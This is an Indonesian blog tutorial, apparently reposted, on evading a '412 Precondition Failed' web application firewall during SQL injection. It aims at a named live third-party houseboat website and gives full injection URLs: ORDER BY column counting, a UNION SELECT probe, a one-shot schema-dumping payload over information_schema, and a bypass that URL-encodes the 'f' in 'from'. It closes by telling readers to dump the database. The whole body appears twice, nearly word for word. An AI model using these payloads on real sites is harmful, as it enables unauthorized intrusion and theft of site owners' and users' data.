Cara Bypass Sqli 412 Precondition Failed
Oke pada kesempatan kali ini gw mau sharing tutorial Cara Bypass Sqli 412 Precondition Failed.
Pernah gasih kalian pada dikala melaksanakan inject suatu website gatau kenapa tiba-tiba kena WAF sama ibarat halnya yang gw alamin dikala ini yakni kena waf 412 precondition failed.
Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi kini kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.
Disini gw udah sanggup sasaran yang mau di sanksi atau di bypass, dan ini live targetnya,
http://www.cruiseland.in/houseboat-package-detailed.php?id=5
Selanjutnya pribadi saja kita masukan order+by+1-- dan hingga menemukan errornya.
Disini gw mendapat errornya diangka 11 berarti jumlah columnnya ada 10.
Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya hingga angka 10 ibarat berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--
Dan disini gw mendapat angka magicknya 2 dan 5 lebih jelasnya sanggup dlihat gambar bawah ini,
Setelah kita mendapat angka magicknya, kini kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 ibarat berikut ini,
Dan ternyata sehabis di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.
Cara bypassnya tinggal ubah aksara f pada " from " dengan url encode ibarat ini contohnya,
f=%66
%66rom
Contoh ibarat berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.
Sekian dari gue, agar bermanfaat.
Pernah gasih kalian pada dikala melaksanakan inject suatu website gatau kenapa tiba-tiba kena WAF sama ibarat halnya yang gw alamin dikala ini yakni kena waf 412 precondition failed.
Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi kini kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.
Disini gw udah sanggup sasaran yang mau di sanksi atau di bypass, dan ini live targetnya,
http://www.cruiseland.in/houseboat-package-detailed.php?id=5
Selanjutnya pribadi saja kita masukan order+by+1-- dan hingga menemukan errornya.
Disini gw mendapat errornya diangka 11 berarti jumlah columnnya ada 10.
Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya hingga angka 10 ibarat berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--
Dan disini gw mendapat angka magicknya 2 dan 5 lebih jelasnya sanggup dlihat gambar bawah ini,
Setelah kita mendapat angka magicknya, kini kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 ibarat berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Dan ternyata sehabis di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.
Cara bypassnya tinggal ubah aksara f pada " from " dengan url encode ibarat ini contohnya,
f=%66
%66rom
Contoh ibarat berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.
Sekian dari gue, agar bermanfaat.
Sumber http://maqlo-heker.blogspot.com/